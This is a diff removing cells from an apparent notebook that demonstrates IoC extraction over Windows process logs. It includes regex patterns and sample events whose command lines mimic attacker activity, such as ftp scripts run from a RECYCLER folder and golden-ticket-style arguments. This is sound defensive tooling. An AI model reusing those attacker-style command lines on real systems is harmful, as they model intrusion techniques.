-       "126         115  \n",
-       "127         116  "
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    }
-   ],
-   "source": [
-    "ioc_extractor = IoCExtract()\n",
-    "ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'], os_family='Windows')\n",
-    "if len(ioc_df):\n",
-    "    display(HTML(\"<h3>IoC patterns found in process tree.</h3>\"))\n",
-    "    display(ioc_df)"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='iocextractapi'></a>[Contents](#toc)\n",
-    "## IoCExtractor API\n"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 16,
-   "metadata": {},
-   "outputs": [],
-   "source": [
-    "# IoCExtract docstring\n",
-    "IoCExtract?"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='regexpatterns'></a>[Contents](#toc)\n",
-    "### Predefined Regex Patterns"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 29,
-   "metadata": {},
-   "outputs": [
-    {
-     "data": {
-      "text/html": [
-       "<b>ipv4</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('(?P<ipaddress>(?:[0-9]{1,3}\\\\.){3}[0-9]{1,3})', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>ipv6</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('(?<![:.\\\\w])(?:[A-F0-9]{1,4}:){7}[A-F0-9]{1,4}(?![:.\\\\w])', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>dns</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('((?=[a-z0-9-]{1,63}\\\\.)[a-z0-9]+(-[a-z0-9]+)*\\\\.){2,}[a-z]{2,63}', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>url</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile(\"\\n            (?P<protocol>(https?|ftp|telnet|ldap|file)://)\\n            (?P<userinfo>([a-z0-9-._~!$&\\\\'()*+,;=:]|%[0-9A-F]{2})*@)?\\n            (?P<host>([a-z0-9-._~!$&\\\\'()*+,;=]|%[0-9A-F]{2})*)\\n, re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>windows_path</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('\\n            (?P<root>[a-z]:|\\\\\\\\\\\\\\\\[a-z0-9_.$-]+||[.]+)\\n            (?P<folder>\\\\\\\\(?:[^\\\\/:*?\"\\\\\\'<>|\\\\r\\\\n]+\\\\\\\\)*)\\n            (?P<file>[^\\\\\\\\/*?\"\"<>|\\\\r\\\\n ]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>linux_path</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('(?P<root>/+||[.]+)\\n            (?P<folder>/(?:[^\\\\\\\\/:*?<>|\\\\r\\\\n]+/)*)\\n            (?P<file>[^/\\\\0<>|\\\\r\\\\n ]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>md5_hash</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>sha1_hash</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<b>sha256_hash</b>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div style=\"margin-left:20px\"><pre>re.compile('(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])', re.IGNORECASE|re.MULTILINE|re.VERBOSE)<pre></div>)"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    }
-   ],
-   "source": [
-    "extractor = IoCExtract()\n",
-    "\n",
-    "for ioc_type, pattern in extractor.ioc_types.items():\n",
-    "    display(HTML(f'<b>{ioc_type}</b>'))\n",
-    "    display(HTML(f'<div style=\"margin-left:20px\"><pre>{pattern.comp_regex}<pre></div>)'))"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='addingpatterns'></a>[Contents](#toc)\n",
-    "### Adding your own pattern(s)\n",
-    "Docstring:\n",
-    "```\n",
-    "Add an IoC type and regular expression to use to the built-in set.\n",
-    "\n",
-    "Note: adding an ioc_type that exists in the internal set will overwrite that item\n",
-    "Regular expressions are compiled with re.I | re.X | re.M (Ignore case, Verbose\n",
-    "and MultiLine)\n",
-    "    :param: ioc_type{str} - a unique name for the IoC type\n",
-    "    :param: ioc_regex{str} - a regular expression used to search for the type\n",
-    "```"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 33,
-   "metadata": {},
-   "outputs": [],
-   "source": [
-    "import re\n",
-    "rcomp = re.compile(r'(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)')"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 39,
-   "metadata": {},
-   "outputs": [
-    {
-     "name": "stdout",
-     "output_type": "stream",
-     "text": [
-      "IoCPattern(ioc_type='win_named_pipe', comp_regex=re.compile('(?P<pipe>\\\\\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\[^\\\\s\\\\\\\\]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE), priority=0)\n"
-     ]
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div>\n",
-       "<style scoped>\n",
-       "    .dataframe tbody tr th:only-of-type {\n",
-       "        vertical-align: middle;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe tbody tr th {\n",
-       "        vertical-align: top;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe thead th {\n",
-       "        text-align: right;\n",
-       "    }\n",
-       "</style>\n",
-       "<table border=\"1\" class=\"dataframe\">\n",
-       "  <thead>\n",
-       "    <tr style=\"text-align: right;\">\n",
-       "      <th></th>\n",
-       "      <th>IoCType</th>\n",
-       "      <th>Observable</th>\n",
-       "      <th>SourceIndex</th>\n",
-       "    </tr>\n",
-       "  </thead>\n",
-       "  <tbody>\n",
-       "    <tr>\n",
-       "      <th>116</th>\n",
-       "      <td>win_named_pipe</td>\n",
-       "      <td>\\\\.\\pipe\\blahtest\"</td>\n",
-       "      <td>107</td>\n",
-       "    </tr>\n",
-       "  </tbody>\n",
-       "</table>\n",
-       "</div>"
-      ],
-      "text/plain": [
-       "            IoCType          Observable SourceIndex\n",
-       "116  win_named_pipe  \\\\.\\pipe\\blahtest\"         107"
-      ]
-     },
-     "execution_count": 39,
-     "metadata": {},
-     "output_type": "execute_result"
-    }
-   ],
-   "source": [
-    "extractor.add_ioc_type(ioc_type='win_named_pipe', ioc_regex=r'(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)')\n",
-    "\n",
-    "# Check that it added ok\n",
-    "print(extractor.ioc_types['win_named_pipe'])\n",
-    "\n",
-    "# Use it in our data set\n",
-    "ioc_extractor.extract(data=process_tree, columns=['CommandLine'], os_family='Windows').query('IoCType == \\'win_named_pipe\\'')"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='extractmethod'></a>[Contents](#toc)\n",
-    "### extract() method\n",
-    "```\n",
-    "Docstring:\n",
-    "Extract IoCs from either a string or pandas DataFrame.\n",
-    "\n",
-    "    :param data: input DataFrame from which to read source strings\n",
-    "    :param columns: The list of columns to use as source strings,\n",
-    "        if the data parameter is used.\n",
-    "    :param src: source string in which to look for IoC patterns\n",
-    "    :param os_family: 'Linux' or 'Windows'\n",
-    "\n",
-    "Returns:\n",
-    "    dict of found observables (if input is a string) or\n",
-    "    DataFrame of observables\n",
-    "\n",
-    "Extract takes either a string or a pandas DataFrame as input.\n",
-    "When using the string option as an input extract will\n",
-    "return a dictionary of results.\n",
-    "When using a DataFrame the results will be returned as a new\n",
-    "DataFrame with the following columns:\n",
-    "- IoCType: the mnemonic used to distinguish different IoC Types\n",
-    "- Observable: the actual value of the observable\n",
-    "- SourceIndex: the index of the row in the input DataFrame from\n",
-    "which the source for the IoC observable was extracted.\n",
-    "```\n",
-    "\n",
-    "**Note** the os_family parameter is optional. If you are not interested in searching for Linux paths omit this or set to 'Windows'. Almost anything is a legal character in a Linux path name so this is a very loose regex (the built-in one is more restrictive than the possible path names, otherwise this will match too much to be useful)."
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 42,
-   "metadata": {
-    "scrolled": true
-   },
-   "outputs": [
-    {
-     "data": {
-      "text/html": [
-       "<div>\n",
-       "<style scoped>\n",
-       "    .dataframe tbody tr th:only-of-type {\n",
-       "        vertical-align: middle;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe tbody tr th {\n",
-       "        vertical-align: top;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe thead th {\n",
-       "        text-align: right;\n",
-       "    }\n",
-       "</style>\n",
-       "<table border=\"1\" class=\"dataframe\">\n",
-       "  <thead>\n",
-       "    <tr style=\"text-align: right;\">\n",
-       "      <th></th>\n",
-       "      <th>IoCType</th>\n",
-       "      <th>Observable</th>\n",
-       "      <th>SourceIndex</th>\n",
-       "    </tr>\n",
-       "  </thead>\n",
-       "  <tbody>\n",
-       "    <tr>\n",
-       "      <th>0</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\ftp.exe</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>1</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\RECYCLER\\xxppyy.exe</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>2</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\ftp</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>3</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
-       "      <td>1</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>4</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>1</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>5</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
-       "      <td>2</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>6</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
-       "      <td>3</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>7</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32</td>\n",
-       "      <td>3</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>8</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
-       "      <td>4</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>9</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\users\\MSTICAdmin\\12345.exe</td>\n",
-       "      <td>4</td>\n",
-       "    </tr>\n",
-       "  </tbody>\n",
-       "</table>\n",
-       "</div>"
-      ],
-      "text/plain": [
-       "        IoCType                           Observable SourceIndex\n",
-       "0  windows_path       C:\\Diagnostics\\UserTmp\\ftp.exe           0\n",
-       "1  windows_path               C:\\RECYCLER\\xxppyy.exe           0\n",
-       "2  windows_path                                .\\ftp           0\n",
-       "3  windows_path       C:\\Diagnostics\\UserTmp\\reg.exe           1\n",
-       "4  windows_path                                .\\reg           1\n",
-       "5  windows_path       C:\\Diagnostics\\UserTmp\\cmd.exe           2\n",
-       "6  windows_path  C:\\Diagnostics\\UserTmp\\rundll32.exe           3\n",
-       "7  windows_path                           .\\rundll32           3\n",
-       "8  windows_path  C:\\Diagnostics\\UserTmp\\rundll32.exe           4\n",
-       "9  windows_path        c:\\users\\MSTICAdmin\\12345.exe           4"
-      ]
-     },
-     "execution_count": 42,
-     "metadata": {},
-     "output_type": "execute_result"
-    }
-   ],
-   "source": [
-    "# You can specify multiple columns\n",
-    "ioc_extractor.extract(data=process_tree.head(20), columns=['NewProcessName', 'CommandLine']).head(10)"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='mergeresults'></a>[Contents](#toc)\n",
-    "### SourceIndex column allows you to merge the results with the input DataFrame\n",
-    "Where an input row has multiple IoC matches the output of this merge will result in duplicate rows from the input (one per IoC match). The previous index is preserved in the second column (and in the SourceIndex column).\n",
-    "\n",
-    "Note: you will need to set the type of the SourceIndex column. In the example below case we are matching with the default numeric index so we force the type to be numeric. In cases where you are using an index of a different dtype you will need to convert the SourceIndex (dtype=object) to match the type of your index column."
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 55,
-   "metadata": {
-    "scrolled": true
-   },
-   "outputs": [
-    {
-     "data": {
-      "text/html": [
-       "<div>\n",
-       "<style scoped>\n",
-       "    .dataframe tbody tr th:only-of-type {\n",
-       "        vertical-align: middle;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe tbody tr th {\n",
-       "        vertical-align: top;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe thead th {\n",
-       "        text-align: right;\n",
-       "    }\n",
-       "</style>\n",
-       "<table border=\"1\" class=\"dataframe\">\n",
-       "  <thead>\n",
-       "    <tr style=\"text-align: right;\">\n",
-       "      <th></th>\n",
-       "      <th>Unnamed: 0</th>\n",
-       "      <th>TenantId</th>\n",
-       "      <th>Account</th>\n",
-       "      <th>EventID</th>\n",
-       "      <th>TimeGenerated</th>\n",
-       "      <th>Computer</th>\n",
-       "      <th>SubjectUserSid</th>\n",
-       "      <th>SubjectUserName</th>\n",
-       "      <th>SubjectDomainName</th>\n",
-       "      <th>SubjectLogonId</th>\n",
-       "      <th>NewProcessId</th>\n",
-       "      <th>NewProcessName</th>\n",
-       "      <th>TokenElevationType</th>\n",
-       "      <th>ProcessId</th>\n",
-       "      <th>CommandLine</th>\n",
-       "      <th>ParentProcessName</th>\n",
-       "      <th>TargetLogonId</th>\n",
-       "      <th>SourceComputerId</th>\n",
-       "      <th>TimeCreatedUtc</th>\n",
-       "      <th>NodeRole</th>\n",
-       "      <th>Level</th>\n",
-       "      <th>ProcessId1</th>\n",
-       "      <th>NewProcessId1</th>\n",
-       "      <th>IoCType</th>\n",
-       "      <th>Observable</th>\n",
-       "      <th>SourceIndex</th>\n",
-       "    </tr>\n",
-       "  </thead>\n",
-       "  <tbody>\n",
-       "    <tr>\n",
-       "      <th>0</th>\n",
-       "      <td>0</td>\n",
-       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
-       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
-       "      <td>4688</td>\n",
-       "      <td>2019-01-15 05:15:15.677</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
-       "      <td>MSTICAdmin</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>0xfaac27</td>\n",
-       "      <td>0x1580</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\ftp.exe</td>\n",
-       "      <td>%%1936</td>\n",
-       "      <td>0xbc8</td>\n",
-       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
-       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
-       "      <td>0x0</td>\n",
-       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
-       "      <td>2019-01-15 05:15:15.677</td>\n",
-       "      <td>source</td>\n",
-       "      <td>0</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\ftp.exe</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>1</th>\n",
-       "      <td>0</td>\n",
-       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
-       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
-       "      <td>4688</td>\n",
-       "      <td>2019-01-15 05:15:15.677</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
-       "      <td>MSTICAdmin</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>0xfaac27</td>\n",
-       "      <td>0x1580</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\ftp.exe</td>\n",
-       "      <td>%%1936</td>\n",
-       "      <td>0xbc8</td>\n",
-       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
-       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
-       "      <td>0x0</td>\n",
-       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
-       "      <td>2019-01-15 05:15:15.677</td>\n",
-       "      <td>source</td>\n",
-       "      <td>0</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\RECYCLER\\xxppyy.exe</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>2</th>\n",
-       "      <td>0</td>\n",
-       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
-       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
-       "      <td>4688</td>\n",
-       "      <td>2019-01-15 05:15:15.677</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
-       "      <td>MSTICAdmin</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>0xfaac27</td>\n",
-       "      <td>0x1580</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\ftp.exe</td>\n",
-       "      <td>%%1936</td>\n",
-       "      <td>0xbc8</td>\n",
-       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
-       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
-       "      <td>0x0</td>\n",
-       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
-       "      <td>2019-01-15 05:15:15.677</td>\n",
-       "      <td>source</td>\n",
-       "      <td>0</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\ftp</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>3</th>\n",
-       "      <td>1</td>\n",
-       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
-       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
-       "      <td>4688</td>\n",
-       "      <td>2019-01-15 05:15:16.167</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
-       "      <td>MSTICAdmin</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>0xfaac27</td>\n",
-       "      <td>0x16fc</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
-       "      <td>%%1936</td>\n",
-       "      <td>0xbc8</td>\n",
-       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
-       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
-       "      <td>0x0</td>\n",
-       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
-       "      <td>2019-01-15 05:15:16.167</td>\n",
-       "      <td>sibling</td>\n",
-       "      <td>1</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
-       "      <td>1</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>4</th>\n",
-       "      <td>1</td>\n",
-       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
-       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
-       "      <td>4688</td>\n",
-       "      <td>2019-01-15 05:15:16.167</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
-       "      <td>MSTICAdmin</td>\n",
-       "      <td>MSTICAlertsWin1</td>\n",
-       "      <td>0xfaac27</td>\n",
-       "      <td>0x16fc</td>\n",
-       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
-       "      <td>%%1936</td>\n",
-       "      <td>0xbc8</td>\n",
-       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
-       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
-       "      <td>0x0</td>\n",
-       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
-       "      <td>2019-01-15 05:15:16.167</td>\n",
-       "      <td>sibling</td>\n",
-       "      <td>1</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>NaN</td>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>1</td>\n",
-       "    </tr>\n",
-       "  </tbody>\n",
-       "</table>\n",
-       "</div>"
-      ],
-      "text/plain": [
-       "   Unnamed: 0                              TenantId  \\\n",
-       "0           0  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
-       "1           0  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
-       "2           0  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
-       "3           1  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
-       "4           1  802d39e1-9d70-404d-832c-2de5e2478eda   \n",
-       "\n",
-       "                      Account  EventID            TimeGenerated  \\\n",
-       "0  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:15.677   \n",
-       "1  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:15.677   \n",
-       "2  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:15.677   \n",
-       "3  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.167   \n",
-       "4  MSTICAlertsWin1\\MSTICAdmin     4688  2019-01-15 05:15:16.167   \n",
-       "\n",
-       "          Computer                                SubjectUserSid  \\\n",
-       "0  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
-       "1  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
-       "2  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
-       "3  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
-       "4  MSTICAlertsWin1  S-1-5-21-996632719-2361334927-4038480536-500   \n",
-       "\n",
-       "  SubjectUserName SubjectDomainName SubjectLogonId NewProcessId  \\\n",
-       "0      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1580   \n",
-       "1      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1580   \n",
-       "2      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x1580   \n",
-       "3      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x16fc   \n",
-       "4      MSTICAdmin   MSTICAlertsWin1       0xfaac27       0x16fc   \n",
-       "\n",
-       "                   NewProcessName TokenElevationType ProcessId  \\\n",
-       "0  C:\\Diagnostics\\UserTmp\\ftp.exe             %%1936     0xbc8   \n",
-       "1  C:\\Diagnostics\\UserTmp\\ftp.exe             %%1936     0xbc8   \n",
-       "2  C:\\Diagnostics\\UserTmp\\ftp.exe             %%1936     0xbc8   \n",
-       "3  C:\\Diagnostics\\UserTmp\\reg.exe             %%1936     0xbc8   \n",
-       "4  C:\\Diagnostics\\UserTmp\\reg.exe             %%1936     0xbc8   \n",
-       "\n",
-       "                                                          CommandLine  \\\n",
-       "0                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe   \n",
-       "1                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe   \n",
-       "2                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe   \n",
-       "3  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !   \n",
-       "4  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !   \n",
-       "\n",
-       "             ParentProcessName TargetLogonId  \\\n",
-       "0  C:\\Windows\\System32\\cmd.exe           0x0   \n",
-       "1  C:\\Windows\\System32\\cmd.exe           0x0   \n",
-       "2  C:\\Windows\\System32\\cmd.exe           0x0   \n",
-       "3  C:\\Windows\\System32\\cmd.exe           0x0   \n",
-       "4  C:\\Windows\\System32\\cmd.exe           0x0   \n",
-       "\n",
-       "                       SourceComputerId           TimeCreatedUtc NodeRole  \\\n",
-       "0  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:15.677   source   \n",
-       "1  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:15.677   source   \n",
-       "2  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:15.677   source   \n",
-       "3  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.167  sibling   \n",
-       "4  46fe7078-61bb-4bed-9430-7ac01d91c273  2019-01-15 05:15:16.167  sibling   \n",
-       "\n",
-       "   Level  ProcessId1  NewProcessId1       IoCType  \\\n",
-       "0      0         NaN            NaN  windows_path   \n",
-       "1      0         NaN            NaN  windows_path   \n",
-       "2      0         NaN            NaN  windows_path   \n",
-       "3      1         NaN            NaN  windows_path   \n",
-       "4      1         NaN            NaN  windows_path   \n",
-       "\n",
-       "                       Observable  SourceIndex  \n",
-       "0  C:\\Diagnostics\\UserTmp\\ftp.exe            0  \n",
-       "1          C:\\RECYCLER\\xxppyy.exe            0  \n",
-       "2                           .\\ftp            0  \n",
-       "3  C:\\Diagnostics\\UserTmp\\reg.exe            1  \n",
-       "4                           .\\reg            1  "
-      ]
-     },
-     "execution_count": 55,
-     "metadata": {},
-     "output_type": "execute_result"
-    }
